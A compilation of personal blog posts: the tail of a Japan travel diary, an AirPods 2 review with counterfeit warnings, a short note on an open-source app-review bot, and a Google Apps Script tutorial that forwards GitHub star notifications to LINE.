Queue up to buy tickets to visit the Peace Memorial Museum, which has a very rich history of the nuclear bombing process, history, as well as data photos and objects; the overall visit is very heavy and shocking.
On the other side of the park, there is also a memorial hall, but it was too heavy to go in.
In the evening, a drizzle started, matching the mood of just having seen a painful historical lesson, and returned to Hiroshima Station.
Bought some souvenirs at the station and a bento box to take away, then returned to the hotel to rest, still need to do laundry today.
APA’s president is really everywhere, President’s curry, President’s water, President’s book…
The room density is as dense as usual, with over 60 rooms on one floor.
The room is small, but well-equipped, and the electronic facilities are very convenient (you can see the laundry room dynamics in the room, and the TV can directly Airplay).
Encountered a big trouble when doing laundry, long queues, with only 7 washing machines for over 1000 rooms in the building. Finally, seized the right timing, queued downstairs when the washing machine was about to finish, and finally finished washing and drying clothes around 11 o’clock (not dry yet, continue to hang in the room).
It was so late, it was very reasonable to have a late-night snack today! Still Y1000 + milk + convenience store ready-to-eat food.
Early in the morning, the weather was beautiful and sunny; checked out of the hotel, said goodbye to Hiroshima, and headed to Kurashiki to leave luggage at the hotel (can also leave it in Okayama first, as you need to go to Okayama before going to Kurashiki).
First stop at Achi Shrine, located at a higher altitude overlooking the entire Kurashiki area, very quiet with few people.
Atsushi Shrine is not big but famous for its Ema Pavilion. If you draw a bad fortune, you can tie it under the corresponding animal head according to your zodiac sign. There is also the “Hanawa Musubi” for seeking good relationships (source):
The area is not large but very quiet and pleasant to stroll around. As the boat tickets were sold out that day, we didn’t get a chance to experience it, but walking around the nearby alleys was also very comfortable.
For lunch, we had the famous curry set meal at Miyake Shoten. The curry was rich and delicious, especially paired with burdock strips.
After eating, we continued our stroll and when we got tired, we went to have the “Fruit Parfait” at Parlor Kudamachi (where the staff wears maid costumes from the Taisho era). The Okayama Seio grapes with fruit ice cream were sweet to the point of numbness.
For souvenirs, you can buy the collagen-rich Okayama fruit jelly from GOHOBI, a specialty of Kurashiki.
As the sun set, we took the train back to Okayama Station, where we could directly take a tram to the area around Okayama Castle.
First stop at Okayama Korakuen Garden, the evening illumination feels romantic and beautiful.
On the way, visit the neighboring Okayama Castle to see the night view, which has a unique charm with the maple leaves illuminated.
Dinner was easily settled by having Ichiran ramen on the spot, then strolling back to Okayama Station (the street lights were beautiful along the way). Before returning to Kurashiki, there was some time to browse through the discount store (Don Quijote), but there were not many souvenirs, so you have to go to Okayama Station or department stores to find them…
Upon returning to Kurashiki, it was already evening, the weather was cold, and people on the street were rushing home. The outlet behind Kurashiki Station had also closed.
Only then did I realize that the hotel did not have a 24-hour front desk, luckily I didn’t come back too late! However, the hotel room facilities were very complete, with a microwave, kettle, and glasses cleaning machine.
On the last night in Japan, I simply had convenience store chicken nuggets + a ¥1000 bill and bought an extra bottle of white peach strawberry milk as a midnight snack before falling asleep.
In the early morning just as the day was breaking, I checked out and headed to Okayama.
Planning to take the airport shuttle from Okayama back to the airport, there is also a direct shuttle from Kurashiki to Okayama Airport but with fewer trips ( For details, please refer to the official website ). Since I hadn’t finished exploring Okayama yesterday, I decided to head straight to Okayama and then return from there.
Upon arriving at the station, head straight to Kibitsu Shrine (about a 30-minute drive). It takes another 15 minutes to walk from the station to reach the shrine, which features a historic cypress corridor, ginkgo trees, and historical buildings, perfect for a leisurely visit.
There is another Kibitsu Shrine on the other side of the mountain, which you can also visit on the way, but due to time constraints, we skipped it this time.
After returning to Okayama Station, head to the nearby AEON department store to buy souvenirs, shop around, have a tempura soba lunch, and then prepare to catch the airport shuttle back to Okayama Airport.
There are many people waiting for the shuttle, but there is no need to worry about not getting on the bus, as extra buses are scheduled to ensure everyone reaches the airport.
The airport is a bit dated, similar in size to Kumamoto Airport, and by around 13:50, you will have completed security check-in and departure procedures, with about 2 hours left until the 15:25 departure time.
The airport has very few flights, with only passengers from the same flight. Check-in and baggage drop-off take less than 15 minutes. An interesting feature is that the X-ray machine at Okayama Airport is located in the airport lobby. After passing through the X-ray, seal your luggage before proceeding to check-in (if you open your luggage, you will be asked to go through security again).
After dropping off your luggage on the terminal floor (only 2 floors in total), take a stroll around. There is an observation deck for viewing, as well as a cafe and several restaurants to grab a bite to eat. When you’re tired, treat yourself to a white peach ice cream cone.
Security check is also quick, but at Okayama Airport, you need to remove your boots for the check, which can be a bit inconvenient.
In case of flight delays, wait in the boarding area until finally taking off at 16:24 (almost an hour delay).
Farewell, Okayama, farewell, Hiroshima.
Following the “2023 Kyushu 10-Day Solo Trip” a few days ago, there was a lingering sense of loneliness, being alone in unfamiliar places and hardly speaking any Japanese for 10 days. The memory of that loneliness remains fresh, so there isn’t much desire to go back. The trip was mainly due to the upcoming work commitments and the opportunity of getting a super discounted flight ticket.
On the first day, while exchanging for the JR Pass, I coincidentally got stuck, met a group of Taiwanese who were also stuck, took turns trying with them, and coincidentally, she was also heading to Hiroshima. We both bought tickets for the next train, coincidentally both wanted to go to the convenience store first, and coincidentally, we were in the same industry, so we had a lot to talk about. Both traveling alone, we ended up forming a group and completing the same itinerary together on the first day.
Many itineraries, attractions, and time arrangements are provided by Angie. If I were to travel on my own, I might wander around or miss out, and end up walking alone for 6 days.
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
When AirPods first came out, I didn’t pay much attention; at first glance, they just looked like a showerhead-shaped wireless Bluetooth earphone. At that time, the wireless Bluetooth earphone market was also very competitive, with various styles and needs being met, and the price wasn’t friendly either. What was so special about it?
It wasn’t until I actually got my hands on it that I felt its “amazing” aspect. Since its launch, AirPods have consistently ranked among the top in Bluetooth earphone sales, not just because of Apple fans’ loyalty. So, what’s so good about it? Let’s continue to find out.
I was originally just a simple iPhone user. Last year, I got a MacBook Pro and an Apple Watch S4, and started falling into the Apple ecosystem (commonly known as the Apple Family Bucket). Having bought the watch, the only thing missing was a pair of earphones.
The Bluetooth earphones I was using had been in service for a while. They were decent, not bad but not particularly outstanding either. The sound quality was average, and the battery life was good. The pain points were unclear calls, signal interference, long press to turn on/off, pairing wait time, and unclear battery indicators. These were all minor issues. I mainly used them for commuting and exercising, and mostly used speakers or wired earphones in front of the computer, so they met my basic needs.
After the launch of AirPods 1st generation, most of my friends had good experiences with them. This time, I decided to follow the trend and get the AirPods 2nd generation.
p.s. Since I haven’t used the 1st generation, my considerations for purchasing won’t include comparisons with the 1st generation (this article also won’t mention differences with the 1st generation).
The price difference between the wireless and wired versions is $1,200. Initially, I considered buying the wireless version, thinking about the messy charging cables on my bedside table and the convenience of carrying one less cable when traveling.
After Apple announced the cancellation of AirPower, I searched online for similar products and bought a 2-in-1 wireless charging pad for iPhone and Apple Watch. Since iPhone and AirPods don’t need to be charged simultaneously, it could be used as a 3-in-1 alternately.
Everything seemed perfect until I received the product and found that it couldn’t charge the phone and watch simultaneously. The watch’s charging was almost zero, and the speed was very slow. Even using a 5.1V/2.1A adapter didn’t help. I wasn’t sure what voltage adapter to use. Checking online reviews, this issue wasn’t isolated. I ended up returning it.
After thinking about it, it’s just two cables (AirPods and iPhone both use lightning/Apple Watch has a dedicated cable), and wired charging is faster. Wireless charging requires the pad, the cable, and possibly a larger adapter. Comparatively, there’s no significant convenience advantage.
So I ultimately chose the wired version of AirPods 2.
p.s. The difference between the wireless and wired versions is only in the charging case. The wired version is the same as the 1st generation (indicator light inside); the wireless version has the indicator light outside and can also be charged with a cable.
From announcement to sale (in Taiwan), it took about a month. I checked the official website daily, hoping it was available, just like many other netizens XD. The wait was agonizing, as other countries had already started selling!
On 4/23, as soon as it was available, I placed my order. AirPods 2 offers laser engraving (engraving), so I couldn’t resist and had it engraved:
ΛVICII ◢ ◤ — Official Preview Image
In memory of the Swedish legendary music producer AVICII
“One day you’ll leave this world behind So live a life you will remember.” Avicii — The Nights
Can engrave 11 characters, including Chinese/English/symbols/spaces; in practice, most symbols should work. If not supported, it will display “Unable to engrave these characters:”, so no need to worry about garbled text.
p.s Engraving requires an additional week of waiting. Without engraving, you can buy directly at 101 or through a dealer (cheaper price).
The official estimated delivery time is: 5/3~5/10. On 4/29, I was notified that it was shipped from Shanghai, and luckily, I received it on 4/30 before the May Day holiday (super fast!! from Shanghai to Taipei).
Outer Packaging
Unfolded
Close-up of the Body
Full Body Shot
Contents Inside
Unboxing ends! The overall feel is substantial, with excellent hand feel and texture. The engraving is also very delicate; it meets the standard of Apple products!
For the first use of brand new AirPods, just open the AirPods case near the iPhone, and it will prompt you to complete the pairing; no need to press the pairing button.
Mobile Version:
Open “Settings” -> “Bluetooth” -> “Find your AirPods” -> “Settings”
MacBook Version:
Top left “” -> “System Preferences” -> “Bluetooth” (If there’s no sound, change the sound output to AirPods)
You can choose the double-tap action for the left and right ear.
Tap position is below the small hole on the upper side of the earphone body:
I actually figured out the position after some exploration
Quickly switch back to using on iPhone:
Pull up the menu -> Select the audio block -> Select the top right icon -> Switch to AirPods
You can also check the AirPods battery here. (Shows the battery of the one with lower battery)
Method to check battery using widgets:
Swipe left to Control Center -> Bottom “Edit” -> Find “Battery” to add and sort
In the future, you can directly swipe left to Control Center to check the AirPods battery (shows the battery of the one with lower battery). To see the battery of both ears and the case, you need to put one AirPod back in the case and open the case (since the case itself does not have Bluetooth functionality):

Inside the box is the dustproof sticker I applied
There is a BUG here. If your battery widget shows the battery level and then disappears, go to “Settings” -> “Display & Brightness” -> “Text Size” -> Adjust back to the default size (third notch) and it will be fixed!
Apple Watch Battery Check Method:
Swipe up Control Center -> Tap Battery
The battery display window on the Apple Watch will also show the AirPods battery level at the bottom.
p.s. But it seems there is a BUG sometimes it won’t display
- When the AirPod battery is low, you will hear a tone in one or both AirPods. You will hear a tone once when the battery is low, and another tone before the AirPods turn off.
- If the AirPods are in the charging case and the lid is open, the indicator light shows the charging status of the AirPods. If the AirPods are not in the case, the light shows the status of the case. Green means fully charged, and amber means less than one full charge remains.
— Taken from official documentation
Before sharing my experience, let me mention a recent entrepreneurial story I heard; in short, it goes: “When making a product, we should not target a wide range but choose a small niche and gradually expand.”
The biggest difference between AirPods and other brands of Bluetooth earphones is the impeccable attention to small details. For example, when you take one earbud out, the music automatically pauses, and it resumes when you put it back. You can use them directly when taken out, and put them back when not in use, without worrying about turning them on or off or connecting them. In terms of comfort, you can hardly feel their presence when wearing them.
The charging speed is incredibly fast, and they automatically charge when placed in the case. So you only need to occasionally check if the case has power (the case can charge the AirPods about 5 times). You won’t encounter the issue of needing to use Bluetooth earphones only to find them out of power and having to wait for them to charge slowly.
The latency is as rumored; you can hardly feel any delay when watching videos or playing games (I tested it with a racing game).
Hey Siri feature, at first, I thought it was redundant since I have a watch that can also activate Hey Siri from a distance. But after actual use, as mentioned above, it’s all about “detail experience.” The Hey Siri feature on AirPods is on another level; you don’t even need to raise your hand to activate it. Just call out Hey Siri, and it works, truly making Siri feel omnipresent. This feature is particularly convenient when doing housework or holding things in both hands. Additionally, you can call Siri to adjust the volume: “Hey Siri! Louder,” “Hey Siri! Set volume to 75%.”
In summary, using AirPods feels like:
“Everything is so natural.”
You don’t need to focus on unnecessary things; earphones should just be earphones.
Call quality is also impressive. Besides stable basic call quality, the microphone quality is comparable to that of a professional mic, which is amazing. In my test call with a friend, he couldn’t even tell I was using AirPods!
Wearing while riding: I was initially excited to wear them while riding to listen to navigation. However, a friend who already had the first generation said, “No,” because with more than 3/4 of helmets, the process of putting on the helmet would press on the ears, making the earphones easy to fall off. My actual test confirmed this, so I suggest only wearing one earbud while riding for safety.
I still need to mention some drawbacks I found.
The number of gestures you can control is too limited. I’m really used to controlling volume with gestures (though fortunately, I can control Spotify volume with my watch).
Also, while the connection speed to the phone is indeed fast, the connection speed to the computer is slow. My MacBook Pro 2018 is quite slow, but my other Mac Mini connects as quickly as the phone.
The TESTV review channel also mentioned that their MacBook Pro, when used with an external display while closed, would have intermittent signal issues with AirPods (I haven’t experienced this).
Why are there these differences? I guess it’s due to other signal interferences (lights, screen output, other Bluetooth devices)?
The size and shape are the same as wired earpods, and they fall out easily: First, the size and shape are different from earpods. I find earpods a bit loose, but AirPods feel very stable, even when jumping around. However, this varies from person to person. Some people may indeed find them unsuitable. I recommend borrowing a friend’s AirPods to try before buying! *Or stick some artificial skin on the earphone head to increase area and resistance
The sound quality is similar to earpods: As mentioned above, there’s actually a big difference. AirPods have much better sound quality. Although they may not match the sound quality of similarly priced earphones that focus on sound quality and lack noise-canceling features, AirPods are not designed for sound quality. It’s a trade-off based on personal preference. In my experience, the sound quality is immersive, with a wide sound range, and overall, it doesn’t disappoint!
Since I have butterfingers, AirPods are like an egg to me, and I’m afraid I’ll drop and break them. After reading many protective case recommendations, many people recommended this one: Catalyst AirPods Waterproof Case (Protective Case).
The reasons for choosing this are: waterproof, drop-proof, has a hook, and is convenient to use (you don’t need to remove it when taking out the earphones or charging).
Price: Around $1000
[](http://www.youtube.com/watch?v=XD8Lvp1vR1M){:target=”_blank”} |
Mini Unboxing:
Front view, I bought a dark color because I’m afraid of dirt
The back also has a corresponding pairing button
You only need to flip open the top part to take out the earphones
The bottom charging port has a cover that can be opened and closed
p.s. To use the AirPods immediately, I actually bought the case before the AirPods 😂
Question from users: Can the protective case be used for both the 1st and 2nd generation?
The distinction is not between the 1st or 2nd generation but between the wired or wireless version. If you have the wired version, both the 1st and 2nd generations can use it. The wireless version has an indicator light on the outside and the pairing button on the back is more centered, so it cannot share the same protective case with the wired version. Please note this ⚠️
AHA AirPods Dustproof Sticker
Question from users about the fit:
If not applied properly, it won’t fit well. I had to adjust it for a long time to make it fit perfectly. The edges might feel a bit rough (not affecting usage, possibly due to tolerance?).
It’s not easy to apply because the dustproof sticker is a metal piece, and the case itself has a magnet that easily attracts it when you’re trying to align it.
Currently, I feel it’s a bit redundant. I’m not sure how effective it will be after some time, so I’m reserving judgment for now.
Please be especially careful, as there are now high-quality counterfeit versions with cracked chips that also show pairing animations and battery levels, making it almost impossible to distinguish from the real ones by appearance.
The main ways to identify them currently are through software:
However, it’s uncertain if future counterfeit versions will fix these issues, so it’s safer to buy from official or large retail channels.
Recently, on Facebook and Google ad networks, I found unscrupulous merchants selling counterfeits at prices close to the genuine ones (the website is a common one-page scam site), which is very malicious. I think if you’re trying to save money and buy AirPods for around $1000, you should be aware that they are likely fake. But selling counterfeits at genuine prices is extremely low!
Please note, the price of brand new AirPods should not be lower than $4500.
Scam, unknown sellers
If you accidentally placed an order, refuse to accept it if it’s cash on delivery. If you have already received it, immediately call the courier company to request a return (be firm). If you have any issues, you can join the FB Shopping Ad Victims Self-Help Group.
If you see such ads, directly click the top right corner to report to Facebook/Google, or click the ad repeatedly to quickly burn through their ad budget.
Additionally, if you find counterfeit AirPods or Apple products, do not tolerate them. Whether it’s from unknown websites, one-page shopping scams, Shopee, or Ruten, make sure to contact the Intellectual Property Protection Brigade to handle it.
Second generation box image
Please confirm:
For detailed comparison between the 1st and 2nd generation, please refer to this article: AirPods First Generation vs Second Generation Identification Tips, Distinguish Them with These 5 Tricks
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Free and open-source iOS & Android APP latest review tracking Slack Bot
Now redesigned using the new App Store Connect API and relaunched as “ ZReviewTender — Free and Open-source App Reviews Monitoring Bot “.
====
ZReviewsBot is a free, open-source project that helps your app team automatically track the latest reviews of apps on the App Store (iOS) and Google Play (Android) platforms and send them to a designated Slack Channel for you to understand the current app status in real-time.
App Store Connect API now supports reading and managing Customer Reviews, this bot will implement this in future updates, replacing the method of using Fastlane — Spaceship to fetch reviews from the backend.
Following the previous article “ AppStore APP’s Reviews Slack Bot “, I researched and completed a new iOS review fetching tool. I thought it might be suitable as a Side Project Open Source for friends with the same problem.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Writing GAS to connect Github Webhook and forward star notifications to Line
As a maintainer of open-source projects, it’s not for money or fame, but for a sense of vanity; every time I see a new ⭐️ star, I feel a secret joy in my heart. It means that the project I spent time and effort on is really being used and is helpful to friends with the same problems.
Therefore, I have a bit of an obsession with observing ⭐️ stars, frequently refreshing Github to see if the number of ⭐️ stars has increased. I wondered if there was a more proactive way to get notifications when someone stars the repo, without having to manually check.
First, I considered looking for existing tools to achieve this. I searched Github Marketplace and found some tools created by experts.
I tried a few of them, but the results were not as expected. Some were no longer working, some only sent notifications every 5/10/20 stars (I’m just a small developer, even 1 new ⭐️ makes me happy 😝), and some only sent email notifications, but I wanted SNS notifications.
Moreover, installing an app just for “vanity” didn’t feel right, and I was concerned about potential security risks.
The Github App on iOS or third-party apps like GitTrends also do not support this feature.
Based on the above, we can actually use Google Apps Script to quickly and freely create our own Github Repo Star Notifier.
This article uses Line as the notification medium. If you want to use other messaging apps, you can ask ChatGPT how to implement it.
Ask ChatGPT how to implement Line Notify
lineToken
:
Github Repo Notifier: XXXX
)1-on-1 chat with LINE Notify
to send messages to myself via the LINE Notify official bot.githubWebhookSecret
:
We will use this string as a request verification medium between Github Webhook and Google Apps Script.
Due to GAS limitations, it is not possible to obtain
Headers
content indoPost(e)
, so the standard Github Webhook verification method cannot be used, and string matching verification can only be done manually with?secret=
Query.
Go to Google Apps Script, click the top left corner “+ New Project”.
Click the top left “Untitled project” to rename the project.
Here I named the project My-Github-Repo-Notifier
for easy identification in the future.
Code input area:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+
// Constant variables
+const lineToken = 'XXXX';
+// Generate yours line notify bot token: https://notify-bot.line.me/my/
+const githubWebhookSecret = "XXXXX";
+// Generate yours secret string here: https://www.random.org/strings/?num=1&len=32&digits=on&upperalpha=on&loweralpha=on&unique=on&format=html&rnd=new
+
+// HTTP Get/Post Handler
+// Do not open Get method
+function doGet(e) {
+ return HtmlService.createHtmlOutput("Access Denied!");
+}
+
+// Github Webhook will use Post method to come in
+function doPost(e) {
+ const content = JSON.parse(e.postData.contents);
+
+ // Security check to ensure the request is from Github Webhook
+ if (verifyGitHubWebhook(e) == false) {
+ return HtmlService.createHtmlOutput("Access Denied!");
+ }
+
+ // star payload data content["action"] == "started"
+ if(content["action"] != "started") {
+ return HtmlService.createHtmlOutput("OK!");
+ }
+
+ // Combine message
+ const message = makeMessageString(content);
+
+ // Send message, can also be sent to Slack, Telegram...
+ sendLineNotifyMessage(message);
+
+ return HtmlService.createHtmlOutput("OK!");
+}
+
+// Method
+// Generate message content
+function makeMessageString(content) {
+ const repository = content["repository"];
+ const repositoryName = repository["name"];
+ const repositoryURL = repository["svn_url"];
+ const starsCount = repository["stargazers_count"];
+ const forksCount = repository["forks_count"];
+
+ const starrer = content["sender"]["login"];
+
+ var message = "🎉🎉「"+starrer+"」starred your「"+repositoryName+"」Repo 🎉🎉\n";
+ message += "Current total stars: "+starsCount+"\n";
+ message += "Current total forks: "+forksCount+"\n";
+ message += repositoryURL;
+
+ return message;
+}
+
+// Verify if the request is from Github Webhook
+// Due to GAS limitations (https://issuetracker.google.com/issues/67764685?pli=1)
+// Cannot obtain Headers content
+// Therefore, the standard Github Webhook verification method (https://docs.github.com/en/webhooks-and-events/webhooks/securing-your-webhooks)
+// Can only be manually matched with ?secret=XXX
+function verifyGitHubWebhook(e) {
+ if (e.parameter["secret"] === githubWebhookSecret) {
+ return true
+ } else {
+ return false
+ }
+}
+
+// -- Send Message --
+// Line
+// Other message sending methods can ask ChatGPT
+function sendLineNotifyMessage(message) {
+ var url = 'https://notify-api.line.me/api/notify';
+
+ var options = {
+ method: 'post',
+ headers: {
+ 'Authorization': 'Bearer '+lineToken
+ },
+ payload: {
+ 'message': message
+ }
+ };
+ UrlFetchApp.fetch(url, options);
+}
+
lineToken
& githubWebhookSecret
carry the values copied from the previous step.
Additional Github Webhook data when someone presses Star is as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+158
+
{
+ "action": "created",
+ "starred_at": "2023-08-01T03:42:26Z",
+ "repository": {
+ "id": 602927147,
+ "node_id": "R_kgDOI-_wKw",
+ "name": "ZMarkupParser",
+ "full_name": "ZhgChgLi/ZMarkupParser",
+ "private": false,
+ "owner": {
+ "login": "ZhgChgLi",
+ "id": 83232222,
+ "node_id": "MDEyOk9yZ2FuaXphdGlvbjgzMjMyMjIy",
+ "avatar_url": "https://avatars.githubusercontent.com/u/83232222?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/ZhgChgLi",
+ "html_url": "https://github.com/ZhgChgLi",
+ "followers_url": "https://api.github.com/users/ZhgChgLi/followers",
+ "following_url": "https://api.github.com/users/ZhgChgLi/following{/other_user}",
+ "gists_url": "https://api.github.com/users/ZhgChgLi/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/ZhgChgLi/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/ZhgChgLi/subscriptions",
+ "organizations_url": "https://api.github.com/users/ZhgChgLi/orgs",
+ "repos_url": "https://api.github.com/users/ZhgChgLi/repos",
+ "events_url": "https://api.github.com/users/ZhgChgLi/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/ZhgChgLi/received_events",
+ "type": "Organization",
+ "site_admin": false
+ },
+ "html_url": "https://github.com/ZhgChgLi/ZMarkupParser",
+ "description": "ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.",
+ "fork": false,
+ "url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser",
+ "forks_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/forks",
+ "keys_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/teams",
+ "hooks_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/hooks",
+ "issue_events_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/events",
+ "assignees_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/tags",
+ "blobs_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/languages",
+ "stargazers_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/stargazers",
+ "contributors_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/contributors",
+ "subscribers_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/subscribers",
+ "subscription_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/subscription",
+ "commits_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/merges",
+ "archive_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/downloads",
+ "issues_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/labels{/name}",
+ "releases_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/deployments",
+ "created_at": "2023-02-17T08:41:37Z",
+ "updated_at": "2023-08-01T03:42:27Z",
+ "pushed_at": "2023-08-01T00:07:41Z",
+ "git_url": "git://github.com/ZhgChgLi/ZMarkupParser.git",
+ "ssh_url": "git@github.com:ZhgChgLi/ZMarkupParser.git",
+ "clone_url": "https://github.com/ZhgChgLi/ZMarkupParser.git",
+ "svn_url": "https://github.com/ZhgChgLi/ZMarkupParser",
+ "homepage": "https://zhgchg.li",
+ "size": 27449,
+ "stargazers_count": 187,
+ "watchers_count": 187,
+ "language": "Swift",
+ "has_issues": true,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": true,
+ "has_pages": false,
+ "has_discussions": false,
+ "forks_count": 10,
+ "mirror_url": null,
+ "archived": false,
+ "disabled": false,
+ "open_issues_count": 2,
+ "license": {
+ "key": "mit",
+ "name": "MIT License",
+ "spdx_id": "MIT",
+ "url": "https://api.github.com/licenses/mit",
+ "node_id": "MDc6TGljZW5zZTEz"
+ },
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cocoapods",
+ "html",
+ "html-converter",
+ "html-parser",
+ "html-renderer",
+ "ios",
+ "nsattributedstring",
+ "swift",
+ "swift-package",
+ "textfield",
+ "uikit",
+ "uilabel",
+ "uitextview"
+ ],
+ "visibility": "public",
+ "forks": 10,
+ "open_issues": 2,
+ "watchers": 187,
+ "default_branch": "main"
+ },
+ "organization": {
+ "login": "ZhgChgLi",
+ "id": 83232222,
+ "node_id": "MDEyOk9yZ2FuaXphdGlvbjgzMjMyMjIy",
+ "url": "https://api.github.com/orgs/ZhgChgLi",
+ "repos_url": "https://api.github.com/orgs/ZhgChgLi/repos",
+ "events_url": "https://api.github.com/orgs/ZhgChgLi/events",
+ "hooks_url": "https://api.github.com/orgs/ZhgChgLi/hooks",
+ "issues_url": "https://api.github.com/orgs/ZhgChgLi/issues",
+ "members_url": "https://api.github.com/orgs/ZhgChgLi/members{/member}",
+ "public_members_url": "https://api.github.com/orgs/ZhgChgLi/public_members{/member}",
+ "avatar_url": "https://avatars.githubusercontent.com/u/83232222?v=4",
+ "description": "Building a Better World Together."
+ },
+ "sender": {
+ "login": "zhgtest",
+ "id": 4601621,
+ "node_id": "MDQ6VXNlcjQ2MDE2MjE=",
+ "avatar_url": "https://avatars.githubusercontent.com/u/4601621?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/zhgtest",
+ "html_url": "https://github.com/zhgtest",
+ "followers_url": "https://api.github.com/users/zhgtest/followers",
+ "following_url": "https://api.github.com/users/zhgtest/following{/other_user}",
+ "gists_url": "https://api.github.com/users/zhgtest/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/zhgtest/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/zhgtest/subscriptions",
+ "organizations_url": "https://api.github.com/users/zhgtest/orgs",
+ "repos_url": "https://api.github.com/users/zhgtest/repos",
+ "events_url": "https://api.github.com/users/zhgtest/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/zhgtest/received_events",
+ "type": "User",
+ "site_admin": false
+ }
+}
+
After completing the program writing, click “Deploy” in the upper right corner -> “New deployment”:
On the left side, select the type “Web App”:
Release
“Anyone
“For the first deployment, you need to click “Grant access”:
After the account selection pop-up appears, select your current Gmail account:
The “Google hasn’t verified this app” message appears because the app we are developing is for personal use and does not need Google verification.
Simply click “Advanced” -> “Go to XXX (unsafe)” -> “Allow”:
After deployment, you can get the Request URL in the “Web App” section of the result page. Click “Copy” and note down this GAS URL.
⚠️️️ Side note, please note that if the code is modified, you need to update the deployment for it to take effect ⚠️
To make the modified code take effect, similarly click “Deploy” in the upper right corner -> select “Manage deployments” -> select the “✏️” in the upper right corner -> version selection “Create new version” -> click “Deploy”.
This completes the code update deployment.
